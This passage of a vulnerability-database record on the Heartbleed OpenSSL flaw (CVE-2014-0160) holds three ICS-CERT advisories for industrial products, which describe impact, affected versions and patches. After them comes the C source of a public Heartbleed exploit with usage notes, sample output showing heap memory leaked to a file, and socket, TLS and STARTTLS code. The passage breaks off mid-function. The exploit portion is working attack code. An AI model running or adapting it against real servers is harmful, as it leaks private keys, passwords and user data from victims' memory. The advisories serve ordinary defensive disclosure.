TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62192", "id": "SSV:62192", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}], "ics": [{"lastseen": "2020-12-18T03:21:42", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "## OVERVIEW\n\nSchneider Electric Wonderware\u2019s Cyber Security Team has identified an OpenSSL Heartbleed vulnerability in the Wonderware Intelligence application, caused by a third-party component. Schneider Electric Wonderware has produced a patch that mitigates this vulnerability.\n\nThis vulnerability could be exploited remotely. Exploits that target this vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\nThe latest release of Schneider Electric Wonderware Intelligence Version 1.5 SP1 is not susceptible to the OpenSSL vulnerability. However, users have been known to reinstall Tableau Server, the vulnerable third-party component that is affected. Therefore, Schneider Electric Wonderware has issued a patch and a security bulletin addressing this vulnerability in all versions.\n\nTableaua has been identified as the third-party component vendor that has product vulnerable to the OpenSSL Heartbleed bug. The following Tableau products susceptible to the OpenSSL vulnerability used in the Schneider Electric Wonderware Intelligence product are:\n\n * Tableau Server ver 8.0.6 through 8.0.9\n * \u200bTableau Server ver 8.1.0 through 8.1.5.\n\n## IMPACT\n\nA missing bounds check in the handling of the TLS Heartbeat extension can be used to reveal up to 64kB of memory on a connected device. An attacker who successfully exploits this vulnerability may obtain the user credentials and cryptographic keys used to access the device.\n\nImpact to individual organizations depends on many factors that are unique to each organization. NCCIC/ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nSchneider Electric corporate headquarters is located in Paris, France, and maintains offices in more than 100 countries worldwide.\n\nSchneider Electric Wonderware Intelligence is a real-time operations management software distributed by Schneider Electric. Schneider Electric provides automation and information technologies and systems.\n\nAccording to Schneider Electric, Wonderware Intelligence is deployed across several sectors including Critical Manufacturing, Energy, Healthcare and Public Health, and Water and Wastewater Systems. Schneider Electric states that these products are used worldwide.\n\n## VULNERABILITY CHARACTIZATION\n\n### VULNERABILITY OVERVIEW\n\n### IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFERb\n\nThe Heartbleed bug could allow attackers to read unallocated memory of OpenSSL running processes. This could reveal data like transmitted data, passwords, or private keys. The attacker must have network access to the affected devices to exploit this vulnerability.\n\nCVE-2014-0160c has been assigned to this vulnerability. A CVSS v2 base score of 5.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:N/A:N).d\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\nSchneider Electric Wonderware has issued Security Advisory \u201cTableau OpenSSL Vulnerability (LFSEC00000098),\u201d available at (user registration required to access this site):\n\n<https://wdn.wonderware.com/sites/WDN/Pages/Security%20Central/CyberSecurityUpdates.aspx>\n\nTableau has released several firmware update fixes for the OpenSSL vulnerability. Schneider Electric Wonderware has incorporated and successfully tested Wonderware Intelligence Security patch LFSec00000098 (registration required). Tableau has released the following maintenance Versions 8.1.6 and 8.0.10 on its primary and alternate download sites.\n\nThe Tableau primary customer download site (User registration required to access this site) is located here:\n\n<https://auth.tableausoftware.com/user/login?>\n\nThe Tableau alternate download site, where Version 8.1.6 for Desktop and Server (4/10/2014) is available, is located here:\n\n<https://licensing.tableausoftware.com/esdalt/>\n\nSchneider Electric Wonderware recommends customers who have enabled SSL using Tableau Server Versions 8.0.6 through 8.0.9 or 8.1.0 through 8.1.5 should apply the security update to all nodes where the Tableau Dashboard Server is installed. The process consists of uninstalling the Dashboard Server and installing the new version. The server configuration and published dashboards will be preserved during the installation of the new version.\n\nAny certificates used to configure the SSL communications are revoked, new certificates re\u2011acquired, and used after patching the vulnerability.\n\nAny passwords used for accessing the server should also be changed after applying the update.\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: http://ics-cert.us-cert.gov/content/recommended-practices. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. Tableau Software release notes http://www.tableausoftware.com/support/releases, last accessed May 15, 2014.\n * b. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, http://cwe.mitre.org/data/definitions/119.html, web site last accessed May 15, 2014.\n * c. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160, web site last accessed May 15, 2014.\n * d. CVSS Calculator, http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N, web site last accessed May 15, 2014.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/ICSA-14-135-02>); we'd welcome your feedback.\n", "edition": 16, "modified": "2018-08-27T00:00:00", "published": "2014-05-15T00:00:00", "id": "ICSA-14-135-02", "href": "https://www.us-cert.gov//ics/advisories/ICSA-14-135-02", "title": "Schneider Electric Wonderware Intelligence Security Patch for OpenSSL Vulnerability", "type": "ics", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-18T03:21:55", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "## OVERVIEW\n\nThis updated advisory is a follow-up to the updated advisory titled ICSA-14-105-03A Siemens Industrial Products OpenSSL Heartbleed Vulnerability that was published April 29, 2014, on the NCCIC/ICS-CERT web site.\n\nSiemens reported to ICS-CERT a list of products affected by the OpenSSL vulnerability (known as \u201cHeartbleed\u201d). Joel Langill of Infrastructure Defense Security Services reported to ICS-CERT and Siemens the OpenSSL vulnerability affecting the S7-1500.\n\n### **\\--------- Begin Update B Part 1 of 3 --------**\n\nSiemens has produced an update and Security Advisory (SSA-635659) that mitigates this vulnerability in each of the affected products listed below.\n\n### **\\--------- End Update B Part 1 of 3 ----------**\n\nThis vulnerability could be exploited remotely. Exploits that target the OpenSSL Heartbleed vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\n### **\\--------- Begin Update **B** Part 2 of 3 --------**\n\nThe following Siemens products are affected:\n\n * eLAN-8.2 eLAN prior to 8.3.3 (affected when RIP is used\u2014update available),\n * WinCC OA only V3.12 (always affected\u2014update available),\n * S7-1500 V1.5 (affected when HTTPS active\u2014update available),\n * CP1543-1 V1.1 (affected when FTPS active\u2014update available), and\n * APE 2.0 (affected when SSL/TLS component is used in customer implementation\u2014update available).\n\n### **\\--------- End Update B Part 2 of 3 ----------**\n\n## IMPACT\n\nA successful \u201cHeartbleed\u201d exploit of the affected products by an attacker with network access could allow attackers to read sensitive data (to include private keys and user credentials) from the process memory.\n\nImpact to individual organizations depends on many factors that are unique to each organization. ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nSiemens is a multinational company headquartered in Munich, Germany.\n\nThe affected Siemens industrial products are for process and network control and monitoring in critical infrastructure sectors such as Chemical, Critical Manufacturing, Energy, Food and Agriculture, and Water and Wastewater Systems.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### BUFFER ERRORSa\n\nThe Heartbleed vulnerability could allow attackers to read unallocated memory of OpenSSL running processes. This could reveal secrets like transmitted data, passwords, or private keys.\n\nCVE-2014-0160b has been assigned to this vulnerability. A CVSS v2 base score of 5.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:N/A:N).c\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\nThe attacker must have network access to the affected devices to exploit this vulnerability. Siemens recommends operating all products except perimeter devices only within trusted networks.\n\n### **\\--------- Begin Update B Part 3 of 3 --------**\n\nSiemens provides updates for the following products:\n\n * eLAN-8.2. To obtain the update to Version 8.3.3, submit a support request online at:\n\n<http://www.siemens.com/automation/support-request>\n\n * WinCC OA V3.12. The update for WinCC OA 3.12 can be obtained here (login required):\n\n[https://portal.etm.at/index.php?option=com_content&view=category&id=65&layout=blog&Itemid=80](<https://portal.etm.at/index.php?option=com_content&view=category&id=65&layout=blog&Itemid=80>)\n\n * CP-1543-1 V1.1. The update for CP-1543 V1.1 can be obtained here:\n\n<http://support.automation.siemens.com/WW/view/en/92417421>\n\n * APE 2.0. The update for APE can be obtained here:\n\n<http://www.ruggedcom.com/support/appnotes/>\n\n * S7-1500 V1.5. The update for S7-1500 V1.5 can be obtained here:\n\n<http://support.automation.siemens.com/WW/view/en/67295862/133100>\n\n * S7-1500 V1.5. The update for S7-1500 Failsafe V1.5 can be obtained here:\n\n<http://support.automation.siemens.com/WW/view/en/87493352/133100>\n\n### **\\--------- End Update B Part 3 of 3 ----------**\n\nSiemens provides specific advice for mitigating risk in each of the affected products in SSA\u2011635659, which can be found at their web site at the following location:\n\n<http://www.siemens.com/cert/advisories>\n\nThe researcher suggests if HTTPS is not needed to disable it until a patch is available and applied to the vulnerable product/service.\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: http://ics-cert.us-cert.gov/content/recommended-practices. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, http://cwe.mitre.org/data/definitions/119.html, web site last accessed April 15, 2014.\n * b. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160, web site last accessed April 15, 2014.\n * c. CVSS Calculator, http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N, web site last accessed April 15, 2014.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/ICSA-14-105-03B>); we'd welcome your feedback.\n", "edition": 16, "modified": "2018-09-06T00:00:00", "published": "2014-05-20T00:00:00", "id": "ICSA-14-105-03B", "href": "https://www.us-cert.gov//ics/advisories/ICSA-14-105-03B", "title": "Siemens Industrial Products OpenSSL Heartbleed Vulnerability (Update B)", "type": "ics", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-18T03:21:51", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "## OVERVIEW\n\nOn April 09, 2014, Unified Automation GmbH announced that its OPC UA Software Development Kits (SDKs) for Windows included vulnerable OpenSSL libraries. HTTPS support is disabled by default in Unified Automation SDK products. However if HTTPS is used, Unified Automation recommends replacing the OpenSSL library with a current version (1.01.g or later) to mitigate this vulnerability.\n\nThis vulnerability could be exploited remotely. Exploits that target this vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\nThe following Unified Automation GmbH OPC UA SDK for Windows versions are affected:\n\n * C++ based OPC UA SDK V1.4.0 (Windows), and\n * ANSI C based OPC UA SDK V1.4.0 (Windows).\n\n## IMPACT\n\nIf HTTPS is enabled, then use of OPC UA SDK is vulnerable to OpenSSL vulnerability. A missing bounds check in the handling of the TLS Heartbeat extension can be used to reveal up to 64 kB of memory on a connected device. An attacker who successfully exploits this vulnerability could read data passed to this device to include the user credentials and cryptographic keys.\n\nImpact to individual organizations depends on many factors that are unique to each organization. NCCIC/ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nUnified Automation GmbH is a German-based company with SDKs sold worldwide and a majority of customers in Europe and the United States. SDKs are used in critical manufacturing and energy sectors. The SDKs are used by manufacturers of programmable logic controllers, human-machine interface/supervisory control and data acquisition, Data Logging and Supervisory Control (DSC) systems and some manufacturing execution systems (MES) vendors.\n\nThe affected products, C++ based OPC UA SDK V1.4.0 (Windows) and ANSI C-based OPC UA SDK V1.4.0, are software development kits for OPC. Unified Automation offers products and services in the field of standardized communication in automation industry.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFERa\n\nThe C++ UA OPC SDK and ANSI C OPC SDK V1.4.0 use the vulnerable version of OpenSSL 1.0.1f. This affects the use of HTTPS connections, if enabled.\n\nCVE-2014-0160b has been assigned to this vulnerability. A CVSS v2 base score of 5.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:N/A:N).c\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\nUnified Automation recommends the following solutions for customers using the HTTPS functionality:\n\n * Disable HTTPS transport by configuration in the C++ SDK (default),\n * Recompile the SDK without HTTPs Support (default), or\n * Download the current version of OpenSSL from [http://www.openssl.org](<http://www.openssl.org/>) or the personal download area on the Unified Automation web site and recompile the SDK.\n\nFurther information from Unified Automation can be found on its web site:\n\n<http://www.unified-automation.com/news/news-details/article/1139-heartbleed-bug-in-openssl.html>\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: http://ics-cert.us-cert.gov/content/recommended-practices. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, http://cwe.mitre.org/data/definitions/119.html, web site last accessed May 15, 2014.\n * b. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160, web site last accessed May 15, 2014.\n * c. CVSS Calculator, http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N, web site last accessed May 15, 2014.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/ICSA-14-135-04>); we'd welcome your feedback.\n", "edition": 16, "modified": "2018-09-06T00:00:00", "published": "2014-05-15T00:00:00", "id": "ICSA-14-135-04", "href": "https://www.us-cert.gov//ics/advisories/ICSA-14-135-04", "title": "Unified Automation OPC SDK OpenSSL Vulnerability", "type": "ics", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOpenSSL TLS Heartbeat Extension - Heartbleed Information Leak (1)", "edition": 1, "published": "2014-04-10T00:00:00", "title": "OpenSSL TLS Heartbeat Extension - Heartbleed Information Leak (1)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-10T00:00:00", "id": "EXPLOITPACK:E5ADFE523AF247AA238C3E63EF7B0A8F", "href": "", "sourceData": "/* \n* CVE-2014-0160 heartbleed OpenSSL information leak exploit\n* =========================================================\n* This exploit uses OpenSSL to create an encrypted connection\n* and trigger the heartbleed leak. The leaked information is\n* returned within encrypted SSL packets and is then decrypted \n* and wrote to a file to annoy IDS/forensics. The exploit can \n* set heartbeat payload length arbitrarily or use two preset \n* values for NULL and MAX length. The vulnerability occurs due \n* to bounds checking not being performed on a heap value which \n* is user supplied and returned to the user as part of DTLS/TLS \n* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to \n* 1.0.1f are known affected. You must run this against a target \n* which is linked to a vulnerable OpenSSL library using DTLS/TLS.\n* This exploit leaks upto 65535 bytes of remote heap each request\n* and can be run in a loop until the connected peer ends connection.\n* The data leaked contains 16 bytes of random padding at the end.\n* The exploit can be used against a connecting client or server,\n* it can also send pre_cmd's to plain-text services to establish\n* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients\n* will often forcefully close the connection during large leak\n* requests so try to lower your payload request size. \n*\n* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g \n*\n* E.g.\n* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed\n* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\n* [ =============================================================\n* [ connecting to 192.168.11.23 443/tcp\n* [ connected to 192.168.11.23 443/tcp\n* [ <3 <3 <3 heart bleed <3 <3 <3\n* [ heartbeat returned type=24 length=16408\n* [ decrypting SSL packet\n* [ heartbleed leaked length=65535\n* [ final record type=24, length=16384\n* [ wrote 16381 bytes of heap to file 'out'\n* [ heartbeat returned type=24 length=16408\n* [ decrypting SSL packet\n* [ final record type=24, length=16384\n* [ wrote 16384 bytes of heap to file 'out'\n* [ heartbeat returned type=24 length=16408\n* [ decrypting SSL packet\n* [ final record type=24, length=16384\n* [ wrote 16384 bytes of heap to file 'out'\n* [ heartbeat returned type=24 length=16408\n* [ decrypting SSL packet\n* [ final record type=24, length=16384\n* [ wrote 16384 bytes of heap to file 'out'\n* [ heartbeat returned type=24 length=42\n* [ decrypting SSL packet\n* [ final record type=24, length=18\n* [ wrote 18 bytes of heap to file 'out'\n* [ done.\n* $ ls -al out\n* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out\n* $ hexdump -C out\n* - snip - snip \n*\n* Use following example command to generate certificates for clients.\n*\n* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\n* -keyout server.key -out server.crt\n*\n* Debian compile with \"gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\\n* -lssl -Wl,-Bdynamic -lssl3 -lcrypto\" \n*\n* todo: add udp/dtls support.\n*\n* - Hacker Fantastic\n* http://www.mdsec.co.uk\n*\n*/\n#include <stdio.h>\n#include <stdint.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <getopt.h>\n#include <signal.h>\n#include <netdb.h>\n#include <fcntl.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <netinet/in.h>\n#include <inttypes.h>\n#include <openssl/bio.h>\n#include <openssl/ssl.h>\n#include <openssl/err.h>\n#include <openssl/evp.h>\n#include <openssl/tls1.h>\n#include <openssl/rand.h>\n#include <openssl/buffer.h>\n\n#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\\n\t\t(((unsigned int)(c[1])) )),c+=2)\n#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\\n\t\t c[1]=(unsigned char)(((s) )&0xff)),c+=2)\n\nint first = 0;\nint leakbytes = 0;\nint repeat = 1;\nint badpackets = 0;\n\ntypedef struct {\n\tint socket;\n\tSSL *sslHandle;\n\tSSL_CTX *sslContext;\n} connection;\n\ntypedef struct {\n unsigned char type;\n short version;\n unsigned int length;\n unsigned char hbtype;\n unsigned int payload_length;\n void* payload;\n} heartbeat;\n\nvoid ssl_init();\nvoid usage();\nint tcp_connect(char*,int);\nint tcp_bind(char*, int);\nconnection* tls_connect(int);\nconnection* tls_bind(int);\nint pre_cmd(int,int,int);\nvoid* heartbleed(connection* ,unsigned int);\nvoid* sneakyleaky(connection* ,char*, int);\n\nint tcp_connect(char* server,int port){\n\tint sd,ret;\n\tstruct hostent *host;\n struct sockaddr_in sa;\n host = gethostbyname(server);\n sd = socket(AF_INET, SOCK_STREAM, 0);\n if(sd==-1){\n\t\tprintf(\"[!] cannot create socket\\n\");\n\t\texit(0);\n\t}\n\tsa.sin_family = AF_INET;\n sa.sin_port = htons(port);\n sa.sin_addr = *((struct in_addr *) host->h_addr);\n bzero(&(sa.sin_zero),8);\n\tprintf(\"[ connecting to %s %d/tcp\\n\",server,port);\n ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));\n\tif(ret==0){\n\t\tprintf(\"[ connected to %s %d/tcp\\n\",server,port);\n\t}\n\telse{\n\t\tprintf(\"[!] FATAL: could not connect to %s %d/tcp\\n\",server,port);\n\t\texit(0);\n\t}\n\treturn sd;\n}\n\nint tcp_bind(char* server, int port){\n\tint sd, ret, val=1;\n\tstruct sockaddr_in sin;\n\tstruct hostent *host;\n\thost = gethostbyname(server);\n\tsd=socket(AF_INET,SOCK_STREAM,0);\n\tif(sd==-1){\n \t\tprintf(\"[!] cannot create socket\\n\");\n\t\texit(0);\n\t}\n\tmemset(&sin,0,sizeof(sin));\n\tsin.sin_addr=*((struct in_addr *) host->h_addr);\n\tsin.sin_family=AF_INET;\n\tsin.sin_port=htons(port);\n \tsetsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));\n\tret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));\n\tif(ret==-1){\n\t\tprintf(\"[!] cannot bind socket\\n\");\n\t\texit(0);\n\t}\n\tlisten(sd,5);\n\treturn(sd);\n}\n\n\nvoid ssl_init(){\n SSL_load_error_strings();\n SSL_library_init();\n OpenSSL_add_all_digests();\n OpenSSL_add_all_algorithms();\n OpenSSL_add_all_ciphers();\n}\n\nconnection* tls_connect(int sd){\n connection *c;\n\tc = malloc(sizeof(connection));\n if(c==NULL){\n\t\tprintf(\"[ error in malloc()\\n\");\n\t\texit(0);\n\t}\n\tc->socket = sd;\n c->sslHandle = NULL;\n c->sslContext = NULL;\n c->sslContext = SSL_CTX_new(SSLv23_client_method());\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\n if(c->sslContext==NULL)\n ERR_print_errors_fp(stderr);\n c->sslHandle = SSL_new(c->sslContext);\n if(c->sslHandle==NULL)\n ERR_print_errors_fp(stderr);\n if(!SSL_set_fd(c->sslHandle,c->socket))\n ERR_print_errors_fp(stderr);\n if(SSL_connect(c->sslHandle)!=1)\n ERR_print_errors_fp(stderr);\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\n }\n\treturn c;\n}\n\nconnection* tls_bind(int sd){\n\tint bytes;\n connection *c;\n char* buf;\n\tbuf = malloc(4096);\n if(buf==NULL){\n printf(\"[ error in malloc()\\n\");\n exit(0);\n }\n\tmemset(buf,0,4096);\n\tc = malloc(sizeof(connection));\n\tif(c==NULL){\n printf(\"[ error in malloc()\\n\");\n exit(0);\n }\n\tc->socket = sd;\n c->sslHandle = NULL;\n c->sslContext = NULL;\n c->sslContext = SSL_CTX_new(SSLv23_server_method());\n if(c->sslContext==NULL)\n ERR_print_errors_fp(stderr);\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\n\tSSL_CTX_SRP_CTX_init(c->sslContext);\n\tSSL_CTX_use_certificate_file(c->sslContext, \"./server.crt\", SSL_FILETYPE_PEM);\n\tSSL_CTX_use_PrivateKey_file(c->sslContext, \"./server.key\", SSL_FILETYPE_PEM); \n\tif(!SSL_CTX_check_private_key(c->sslContext)){\n\t\tprintf(\"[!] FATAL: private key does not match the certificate public key\\n\");\n\t\texit(0);\n\t}\n\tc->sslHandle = SSL_new(c->sslContext);\n if(c->sslHandle==NULL)\n ERR_print_errors_fp(stderr);\n if(!SSL_set_fd(c->sslHandle,c->socket))\n ERR_print_errors_fp(stderr);\n int rc = SSL_accept(c->sslHandle);\n\tprintf (\"[ SSL connection using %s\\n\", SSL_get_cipher (c->sslHandle));\n\tbytes = SSL_read(c->sslHandle, buf, 4095);\n\tprintf(\"[ recieved: %d bytes - showing output\\n%s\\n[\\n\",bytes,buf);\n\tif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\n }\n return c;\n}\n\nint pre_cmd(int sd,int precmd,int verbose){\n\t/* this function can be used to send commands to a plain-text\n\tservice or client before heartbleed exploit attempt. e.g. STARTTLS */\n\tint rc, go = 0;\n\tchar* buffer;\n\tchar* line1;\n\tchar* line2; \n\tswitch(precmd){\n\t\tcase 0:\n\t\t\tline1 = \"EHLO test\\n\";\n\t\t\tline2 = \"STARTTLS\\n\";\n\t\t\tbreak;\n\t\tcase 1:\n\t\t\tline1 = \"CAPA\\n\";\n\t\t\tline2 = \"STLS\\n\";\n\t\t\tbreak;\n\t\tcase 2:\n\t\t\tline1 = \"a001 CAPB\\n\";\n\t\t\tline2 = \"a002 STARTTLS\\n\";\n\t\t\tbreak;\n\t\tdefault:\n\t\t\tgo = 1;\n\t\t\tbreak;\n\t}\n\tif(go==0){\n\t\tbuffer = malloc(2049);\n\t if(buffer==NULL){\n \tprintf(\"[ error in malloc()\\n\");\n \texit(0);\n\t }\n\t\tmemset(buffer,0,2049);\n\t\trc = read(sd,buffer,2048);\n\t\tprintf(\"[ banner: %s\",buffer);\n\t\tsend(sd,line1,strlen(line1),0);\n\t\tmemset(buffer,0,2049);\n\t\trc = 